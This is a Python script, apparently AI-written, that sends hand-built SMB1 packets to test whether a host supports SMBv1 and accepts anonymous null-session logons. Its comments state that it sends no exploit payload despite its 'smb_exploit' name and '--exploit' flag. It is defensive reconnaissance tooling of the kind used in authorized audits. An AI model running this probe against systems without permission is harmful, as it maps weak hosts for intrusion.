# ai designed!
# This tool is intended for educational purposes and authorized security testing only. Unauthorized access to systems is illegal and unethical. Always obtain permission before testing any systems.
# Bu araç eğitim amaçlı ve yetkilendirilmiş güvenlik testleri için tasarlanmıştır. İzin almadan sistemlere erişim yasa dışıdır ve etik dışıdır. Her zaman sistemleri test etmeden önce izin alın.
import socket
import struct
import argparse
import logging
import os
# Root logger at INFO with plain "LEVEL: message" lines, so the per-host findings below are printed.
logging.basicConfig(format="%(levelname)s: %(message)s", level=logging.INFO)
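# ---------------------------------------------------------------------------
# SMB1 wire-format helpers.  Field order and sizes follow MS-CIFS (SMB_Header,
# SMB_COM_NEGOTIATE request, SMB_COM_SESSION_SETUP_ANDX request with
# WordCount 13).  Frames are assembled with struct so the NetBIOS length and
# the ByteCount are computed from the real payload rather than hand-typed;
# a hand-typed length that does not match the payload makes the server wait
# for bytes that never arrive, and without a socket timeout the probe hangs.
# ---------------------------------------------------------------------------

SMB1_MAGIC = b"\xffSMB"              # Protocol field of every SMB1 header; SMB2/3 answer with b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP_ANDX = 0x73
NETBIOS_HEADER_LEN = 4               # 1 byte message type + 3 byte big-endian length (direct TCP on 445)
SMB1_HEADER_LEN = 32
NT_STATUS_OFFSET = NETBIOS_HEADER_LEN + 5   # Status follows Protocol(4) + Command(1) in the header
DEFAULT_TIMEOUT = 5.0                # seconds; used only when neither the caller nor socket.setdefaulttimeout() set one


def netbios_frame(payload: bytes) -> bytes:
    """Prefix *payload* with a NetBIOS Session Service header (type 0x00, 24-bit length).

    Raises:
        ValueError: the payload does not fit the 24-bit length field.
    """
    if len(payload) > 0xFFFFFF:
        raise ValueError("SMB payload too large for a NetBIOS session message")
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


def smb1_header(command: int, flags2: int) -> bytes:
    """Build the fixed 32-byte SMB1 header for a client request.

    Flags is 0x18 (SMB_FLAGS_CASE_INSENSITIVE | SMB_FLAGS_CANONICALIZED_PATHS).
    TID/PID/UID/MID are 0: nothing has been negotiated or authenticated yet.
    """
    return struct.pack(
        "<4sBIBHH8sHHHHH",
        SMB1_MAGIC,    # Protocol
        command,       # Command
        0,             # Status
        0x18,          # Flags
        flags2,        # Flags2
        0,             # PIDHigh
        b"\x00" * 8,   # SecurityFeatures
        0,             # Reserved
        0,             # TID
        0,             # PIDLow
        0,             # UID
        0,             # MID
    )


def negotiate_packet() -> bytes:
    """SMB_COM_NEGOTIATE request advertising two legacy SMB1 dialects.

    Flags2 0x2801 keeps SMB_FLAGS2_EXTENDED_SECURITY (0x0800) set, as commonly
    used SMBv1 probe packets do.
    """
    dialects = b"".join(b"\x02" + name + b"\x00" for name in (b"LANMAN1.0", b"LM1.2X002"))
    body = struct.pack("<BH", 0, len(dialects)) + dialects   # WordCount = 0, ByteCount = len(dialects)
    return netbios_frame(smb1_header(SMB_COM_NEGOTIATE, 0x2801) + body)


def session_setup_packet() -> bytes:
    """SMB_COM_SESSION_SETUP_ANDX request (WordCount 13) with empty account, domain and password.

    This is an anonymous ("null session") logon attempt, nothing more.  Flags2
    0x2001 leaves SMB_FLAGS2_EXTENDED_SECURITY clear so the non-extended
    WordCount-13 form applies; servers that insist on extended security may
    still reject it -- that shows up as a non-zero NT status in the reply.
    """
    words = struct.pack(
        "<BBHHHHIHHII",
        0xFF,      # AndXCommand: no chained command
        0,         # AndXReserved
        0,         # AndXOffset
        0xFFDF,    # MaxBufferSize
        2,         # MaxMpxCount
        1,         # VcNumber
        0,         # SessionKey
        0,         # OEMPasswordLen
        0,         # UnicodePasswordLen
        0,         # Reserved
        0x40,      # Capabilities: CAP_STATUS32, ask for NT status codes in replies
    )
    data = b"\x00" * 4   # AccountName, PrimaryDomain, NativeOS, NativeLanMan: four empty OEM strings
    body = struct.pack("<B", len(words) // 2) + words + struct.pack("<H", len(data)) + data
    return netbios_frame(smb1_header(SMB_COM_SESSION_SETUP_ANDX, 0x2001) + body)


def recv_exact(conn: socket.socket, n: int) -> bytes:
    """Read up to *n* bytes, looping over short reads; returns fewer bytes only on EOF."""
    chunks = []
    remaining = n
    while remaining > 0:
        chunk = conn.recv(remaining)
        if not chunk:
            break
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


def recv_smb_message(conn: socket.socket) -> bytes:
    """Read one NetBIOS-framed SMB message (frame header included); truncated if the peer closes early."""
    frame = recv_exact(conn, NETBIOS_HEADER_LEN)
    if len(frame) < NETBIOS_HEADER_LEN:
        return frame
    length = int.from_bytes(frame[1:], "big")
    return frame + recv_exact(conn, length)


def is_smb1_response(message: bytes) -> bool:
    """True when *message* carries a complete SMB1 header (not SMB2/3, garbage or an empty reply)."""
    return (
        len(message) >= NETBIOS_HEADER_LEN + SMB1_HEADER_LEN
        and message[NETBIOS_HEADER_LEN:NETBIOS_HEADER_LEN + 4] == SMB1_MAGIC
    )


def nt_status(message: bytes) -> int:
    """NT Status of an SMB1 message; only meaningful after is_smb1_response() returned True."""
    return struct.unpack_from("<I", message, NT_STATUS_OFFSET)[0]


def resolve_timeout(timeout):
    """Explicit argument if given, else socket.getdefaulttimeout(), else DEFAULT_TIMEOUT."""
    if timeout is not None:
        return timeout
    default = socket.getdefaulttimeout()
    return DEFAULT_TIMEOUT if default is None else default


def smb_negotiate_protocol_request(ip, port, *, timeout=None):
    """Send one SMB_COM_NEGOTIATE and report whether the server replied in SMB1 framing.

    Args:
        ip: target host, passed straight to socket.create_connection.
        port: TCP port, normally 445.
        timeout: socket timeout in seconds; None means socket.getdefaulttimeout(), or 5 s.

    Returns:
        True if the reply starts with an SMB1 header (b"\\xffSMB").  False for an SMB2/3
        reply, an empty reply (server closed the connection, typical when SMBv1 is
        disabled) or any socket error -- errors are logged, never raised.

    Note: an SMB1-framed reply shows the server still speaks the SMB1 transport; it does
    not by itself prove that one of the advertised dialects was accepted.
    """
    logging.info("Sending SMB Negotiate Protocol Request")
    try:
        with socket.create_connection((ip, port), timeout=resolve_timeout(timeout)) as conn:
            conn.sendall(negotiate_packet())
            response = recv_smb_message(conn)
    except OSError as e:
        logging.error(f"Error: {e}")
        return False
    if is_smb1_response(response):
        logging.debug(f"{ip}:{port} - negotiate reply NT status 0x{nt_status(response):08x}")
        logging.info(f"{ip}:{port} - SMBv1 supported")
        return True
    logging.debug(f"{ip}:{port} - negotiate reply ({len(response)} bytes) is not SMB1")
    logging.info(f"{ip}:{port} - SMBv1 not supported")
    return False


def smb_session_setup_andx_request(ip, port, *, timeout=None):
    """Attempt an anonymous SMB1 session (empty user, domain and password) and report the result.

    SMB1 requires SMB_COM_NEGOTIATE before SMB_COM_SESSION_SETUP_ANDX on the same
    connection, so both are sent over one socket.  Despite the tool's name this
    function delivers no exploit payload; it only tests whether the server grants a
    null session.

    Args:
        ip: target host, passed straight to socket.create_connection.
        port: TCP port, normally 445.
        timeout: socket timeout in seconds; None means socket.getdefaulttimeout(), or 5 s.

    Returns:
        True only if the session-setup reply is SMB1-framed with NT status 0.  An SMB1
        error reply (e.g. STATUS_LOGON_FAILURE / STATUS_ACCESS_DENIED), a non-SMB1
        negotiate reply, an empty reply or a socket error all return False; socket
        errors are logged, never raised.
    """
    logging.info("Sending SMB Session Setup AndX Request")
    try:
        with socket.create_connection((ip, port), timeout=resolve_timeout(timeout)) as conn:
            conn.sendall(negotiate_packet())
            negotiate_reply = recv_smb_message(conn)
            if not is_smb1_response(negotiate_reply):
                logging.debug(f"{ip}:{port} - negotiate reply is not SMB1; skipping session setup")
                logging.info(f"{ip}:{port} - Session Setup failed")
                return False
            conn.sendall(session_setup_packet())
            response = recv_smb_message(conn)
    except OSError as e:
        logging.error(f"Error: {e}")
        return False
    if is_smb1_response(response):
        status = nt_status(response)
        logging.debug(f"{ip}:{port} - session setup NT status 0x{status:08x}")
        if status == 0:
            logging.info(f"{ip}:{port} - Session Setup successful")
            return True
    logging.info(f"{ip}:{port} - Session Setup failed")
    return False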
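def main():
    """Command-line entry point.

    Probes TARGET_IP:PORT for SMBv1 with a single SMB_COM_NEGOTIATE.  With
    --exploit it additionally attempts an anonymous (empty-credential) SMBv1
    Session Setup AndX; no exploit payload is sent despite the flag's name,
    which is kept for compatibility with existing invocations.  The socket
    timeout is applied process-wide via socket.setdefaulttimeout so the probe
    cannot hang on a host that accepts the connection but never replies.
    """
    parser = argparse.ArgumentParser(
        prog="smb_exploit",
        description="Probe a host for SMBv1 support and optionally attempt an anonymous SMBv1 session setup",
    )
    parser.add_argument("target_ip", help="Target IP address")
    parser.add_argument("-p", "--port", type=int, default=445, help="Target port (default: 445)")
    parser.add_argument(
        "--exploit",
        action="store_true",
        help="After a successful negotiate, also attempt an anonymous (null) Session Setup AndX",
    )
    parser.add_argument(
        "-t", "--timeout", type=float, default=5.0, help="Socket timeout in seconds (default: 5)"
    )
    args = parser.parse_args()
    if not 0 < args.port < 65536:
        parser.error(f"port must be in 1-65535, got {args.port}")
    if args.timeout <= 0:
        parser.error("timeout must be a positive number of seconds")
    socket.setdefaulttimeout(args.timeout)
    # The session-setup attempt is only meaningful if the server answered in SMB1 framing.
    if smb_negotiate_protocol_request(args.target_ip, args.port) and args.exploit:
        smb_session_setup_andx_request(args.target_ip, args.port)


if __name__ == "__main__":
    main()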